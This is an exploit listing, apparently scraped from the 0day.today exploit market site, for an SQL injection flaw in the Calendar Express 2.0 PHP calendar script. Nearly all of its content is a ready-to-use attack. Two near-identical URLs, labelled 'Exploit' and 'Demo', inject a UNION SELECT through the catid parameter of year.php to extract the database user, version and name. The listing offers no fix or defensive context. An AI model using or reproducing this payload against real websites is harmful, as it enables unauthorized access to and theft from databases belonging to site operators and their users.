[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Calendar Express 2.0 SQL Injection Vulnerability

Author
BAYBORA
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10479
Category
web applications
Date add
28-12-2009
Platform
unsorted
================================================
Calendar Express 2.0 SQL Injection Vulnerability
================================================

#############################################################
# Calendar Express 2.0 Vulnerability
 
# Calendar Express 2.0 [Powered by Phplite.com]
 
# Download:http://script.wareseeker.com/download/calendar-express-2.rar/11517
 
# Author: Baybora
##############################################################
 
 
Exploit:
 
 
POST http://localhost/calendarexpress2.1/year.php?catid=-4+union+select+0,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),2/*&cid=&w=&d=9&m=1&y=2008&selection=1
 
 
Demo:
 
http://server/calendarexpress2.1/year.php?catid=-4+union+select+0,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),2/*&cid=&w=&d=9&m=1&y=2008&selection=1



#  0day.today [2024-12-25]  #